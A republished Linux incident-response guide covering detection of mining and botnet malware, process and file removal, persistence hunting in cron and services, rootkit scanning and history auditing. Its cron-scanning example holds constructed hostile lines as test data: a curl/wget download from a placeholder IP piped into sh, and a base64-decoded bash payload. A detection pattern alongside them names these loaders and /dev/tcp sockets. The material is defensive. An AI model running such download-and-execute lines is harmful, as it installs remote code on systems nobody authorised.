Master Linux Incident Response: Step‑by‑Step Virus Detection and Removal

This guide walks you through a complete Linux emergency response workflow—identifying suspicious behavior, terminating malicious processes, removing infected files, eliminating persistence mechanisms, hardening the system, and adding command auditing—using practical shell commands and examples.

Efficient Ops

Overview

Handling emergency response incidents on Linux can be challenging because Linux lacks dedicated tools like Autoruns or Process Explorer and has no unified response workflow. This article explains a Linux incident response process and provides the shell commands used at each stage, so you can handle Linux malware quickly and systematically.

The response is divided into four stages: identify symptoms → remove the virus → close the loop → system hardening.

Identify Symptoms

First, detect abnormal host behavior through system status and security alerts to confirm suspicious activity.

Check CPU usage; high CPU (>70%) with a suspicious process name often indicates a mining virus.

List processes sorted by CPU:

top

Inspect process command lines:

ps aux

Look for unusual command‑line strings (e.g., URLs) that may indicate a downloader.

Security Gateway Alerts

Use gateway alerts to spot threats, then identify which process is communicating with the C&C server:

while true; do netstat -antp | grep [ip]; sleep 1; done

If the malicious entity is a domain with changing IPs, add a rule to /etc/hosts to redirect the domain to a random IP and monitor the associated process.
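The loop above only prints matching lines; the following is an added example (not code from the original article) that parses netstat -antp style output and extracts the PID and program name of every connection to a given remote address, skipping the "-" entries netstat prints when it cannot see the owning process. The sample output, the process name and the addresses are constructed.

```shell
# Added example, not from the original article. Reads "netstat -antp" style
# output (ss -antp has the same shape apart from the last column) and reports
# which local process holds a connection to a given remote IP.
# The sample below is constructed; the process name and addresses are made up.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 10.0.0.5:41234          203.0.113.10:443        ESTABLISHED 4721/unknownbin
tcp        0      0 10.0.0.5:41240          198.51.100.7:80         TIME_WAIT   -'

# conns_to_ip IP: reads netstat output on stdin and prints "PID PROGRAM STATE"
# for every TCP/UDP line whose foreign address (port stripped) equals IP.
conns_to_ip() {
    awk -v ip="$1" '
        $1 ~ /^(tcp|udp)/ {
            host = $5
            sub(/:[^:]*$/, "", host)          # drop the :port suffix, IPv6-safe
            if (host == ip) {
                split($NF, pp, "/")           # last column is "PID/Program name"
                state = (NF >= 7) ? $6 : "-"  # UDP rows have no State column
                print pp[1], pp[2], state
            }
        }'
}

# pids_to_ip IP: unique numeric PIDs only. netstat shows "-" in the PID column
# when run without root or for sockets owned by no process; those are skipped.
pids_to_ip() {
    conns_to_ip "$1" | awk '$1 ~ /^[0-9]+$/ { print $1 }' | sort -u
}

# Live use (root is needed for the PID column), polling once a second instead
# of a tight loop:
#   while true; do netstat -antp | conns_to_ip 203.0.113.10; sleep 1; done
# Then inspect the process:
#   ls -l /proc/<pid>/exe; tr '\0' ' ' < /proc/<pid>/cmdline
```

Run the functions as root, otherwise netstat hides the PID column for processes owned by other users and every hit is reported as "-".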

Suspicious History Commands

Search the host’s command history for malicious commands:

history

Remove Virus

Use the information gathered in the first stage to locate and terminate virus processes and delete infected files.

Terminate Virus Process

ps -elf | grep [pid]
kill -9 [pid]

Delete Virus Files

ls -al /proc/[pid]/exe    # the symlink target is the binary on disk; "(deleted)" means it was already unlinked
rm -f [exe_path]
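Deleting the binary destroys the only copy of the sample. As an added example (not code from the original article), the functions below resolve the path behind /proc/[pid]/exe, keep a copy plus its SHA-256 in an evidence directory, and only then remove the file, clearing the immutable attribute that malware often sets to make rm fail. The evidence path in the comments is an assumption.

```shell
# Added example, not from the original article. Before removing a binary,
# keep a copy and its hash so the sample can be analysed later. The evidence
# directory used in the comments is an assumption.

# resolve_exe PID: prints the path behind /proc/PID/exe. A binary that was
# unlinked while still running shows up as "/path/name (deleted)"; the
# suffix is stripped so the path can still be compared and logged.
resolve_exe() {
    readlink "/proc/$1/exe" 2>/dev/null | sed 's/ (deleted)$//'
}

# preserve_file FILE DIR: copies FILE to DIR/<name>.bin (timestamps kept),
# appends its SHA-256 to DIR/hashes.txt and prints the hash. Returns 1 when
# FILE cannot be read.
preserve_file() {
    f="$1"; dir="$2"
    [ -r "$f" ] || return 1
    mkdir -p "$dir"
    cp -p -- "$f" "$dir/$(basename "$f").bin"
    sha256sum -- "$f" >> "$dir/hashes.txt"
    sha256sum -- "$f" | awk '{ print $1 }'
}

# remove_file FILE: clears the immutable/append-only attributes that malware
# commonly sets on its files (rm fails on them even as root), then unlinks.
# Returns 0 only if the file is gone afterwards.
remove_file() {
    f="$1"
    [ -e "$f" ] || return 0
    chattr -ia "$f" 2>/dev/null || true   # no-op on filesystems without attributes
    rm -f -- "$f"
    [ ! -e "$f" ]
}

# Manual workflow for a confirmed malicious PID:
#   exe=$(resolve_exe 4721)
#   preserve_file "$exe" /root/evidence    # assumed evidence path
#   kill -9 4721
#   remove_file "$exe"
```

Check lsattr on the parent directory as well: an immutable or append-only directory also blocks the unlink even after the file's own attributes are cleared.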

Close Loop (Persistence Removal)

Linux malware has fewer persistence methods than Windows malware, but they include scheduled tasks, malicious services, hijacked system files, and daemon processes.

Check Suspicious Cron Jobs

crontab -l    # current user only; system tables live in /etc/crontab, /etc/cron.d and /var/spool/cron

View anacron tasks:

cat /etc/anacrontab
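The two commands above cover only the current user's crontab and anacron. The following added example (not code from the original article) goes further: it enumerates every standard cron location and flags entries that download-and-execute remote content or decode an embedded payload, which is how most Linux miners and botnet workers keep themselves alive. The file list and the patterns are assumptions to tune per environment; the sample crontab text is constructed.

```shell
# Added example, not from the original article. "crontab -l" only shows the
# current user's table, so this enumerates every standard cron location and
# flags entries that fetch-and-execute remote content or decode payloads.
# The file list and the patterns are assumptions; tune them for your hosts.
# The sample crontab text is constructed.
SAMPLE_CRON='# m h dom mon dow user command
*/5 * * * * root /usr/lib/apt/apt.systemd.daily
*/10 * * * * root (curl -fsSL http://198.51.100.7/x.sh || wget -q -O- http://198.51.100.7/x.sh) | sh
0 3 * * * root echo aGVsbG8= | base64 -d | bash
# 1 * * * * root curl http://198.51.100.7/y | sh'

# cron_files: prints every existing cron file on this host, one per line.
cron_files() {
    for p in /etc/crontab /etc/anacrontab /etc/cron.d/* /etc/cron.hourly/* \
             /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/* \
             /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$p" ] && printf '%s\n' "$p"
    done
    return 0
}

# flag_cron_lines: reads cron text on stdin, prints "<lineno>:<line>" for
# suspicious entries. Commented-out lines are ignored. Patterns: a curl/wget
# piped into a shell, base64 decoding, bash /dev/tcp sockets, scripts in /tmp.
flag_cron_lines() {
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/tcp/|/tmp/[^ ]*\.sh' \
        | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# scan_cron: runs the check over every cron file, prefixing hits with the path.
scan_cron() {
    cron_files | while IFS= read -r f; do
        flag_cron_lines < "$f" | sed "s|^|$f:|"
    done
}

# Usage on a live host (as root so the spool directories are readable):
#   scan_cron
```

A clean result from scan_cron does not prove the host is clean, since the patterns only catch common loaders; read every hit and every file that cron_files lists that you do not recognise.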

Check Suspicious Services

service --status-all

Search for modified system binaries in the last 7 days:

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 -exec ls -la {} +

Inspect potential daemon processes:

lsof -p [pid]

Scan for Malicious Drivers

lsmod

Use chkrootkit and rkhunter for rootkit detection:

# chkrootkit: download, verify the archive against the checksum published by the
# project before building, then build and run
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit-0.52          # directory name follows the version in the tarball
make sense                  # "sense" is the project's build target
./chkrootkit

# rkhunter: download, install, then run a full check
wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c

Command Auditing

Enhance history logging with IP address, timestamp, and user information.

# 1. Raise the number of history entries kept per user (adjust the pattern if
#    your /etc/profile sets a different value)
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile

# 2. Append the block below to /etc/profile so every login shell records the
#    client address, timestamp and user in front of each history entry
USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')
if [ "$USER_IP" = "" ]; then
  USER_IP=$(hostname)
fi
export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
shopt -s histappend                   # bash only: append to the history file instead of overwriting it
export PROMPT_COMMAND="history -a"    # write each command to the file immediately

# 3. Reload the profile in the current session
source /etc/profile
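As an added example (not code from the original article), the pieces of the audit snippet are written below as functions so each can be checked: derive_user_ip extracts the client address from a "who -u am i" line and falls back to the host name for local sessions (the snippet above only falls back when who prints nothing; on a local tty the last field is the PID, which this version also handles), history_format builds the HISTTIMEFORMAT value, and parse_history_line turns a resulting history entry into a "date time|ip|user|command" record that can be shipped to a log collector. All sample lines are constructed.

```shell
# Added example, not from the original article. Functions mirroring the audit
# snippet so its behaviour can be tested; sample input lines are constructed.

# derive_user_ip WHO_LINE: the address inside the trailing parentheses of a
# "who -u am i" line, or the host name (uname -n) when the session has none.
derive_user_ip() {
    ip=$(printf '%s\n' "$1" | sed -n 's/.*(\([^)]*\)).*/\1/p')
    if [ -z "$ip" ]; then
        uname -n
    else
        printf '%s\n' "$ip"
    fi
}

# history_format IP USER: the HISTTIMEFORMAT string. The trailing space is
# deliberate; it separates the prefix from the command text.
history_format() {
    printf '%%F %%T %s %s \n' "$1" "$2"
}

# parse_history_line LINE: expects "  <n>  <date> <time> <ip> <user> <command...>"
# as printed by "history" with the format above; prints "date time|ip|user|command".
parse_history_line() {
    printf '%s\n' "$1" | awk '{
        cmd = ""
        for (i = 6; i <= NF; i++) cmd = cmd (i > 6 ? " " : "") $i
        print $2 " " $3 "|" $4 "|" $5 "|" cmd
    }'
}

# Use in the current shell:
#   export HISTTIMEFORMAT="$(history_format "$(derive_user_ip "$(who -u am i 2>/dev/null)")" "$(whoami)")"
# Convert the saved history into records for a collector:
#   history | while IFS= read -r l; do parse_history_line "$l"; done
```

Shell history is still writable by the user who produces it, so treat these records as a convenience trail, not as tamper-proof audit data; forward them off the host promptly and pair them with auditd or process accounting where integrity matters.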

Patch Common Web Vulnerabilities

Apply patches for known RCE vulnerabilities such as Struts2, ThinkPHP5, Redis unauthorized access, Confluence (CVE‑2019‑3396), Drupal (CVE‑2018‑7600), and ThinkPHP (CVE‑2019‑9082).

Conclusion

Linux malware mainly consists of botnet worms and mining viruses. Because Linux servers are often exposed to the Internet and web applications have frequent vulnerabilities, large‑scale infections are common (e.g., DDG, systemdMiner, BillGates, watchdogs, XorDDos). Adopt strong passwords, regularly patch systems, and follow the steps above to detect, eradicate, and prevent future infections.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
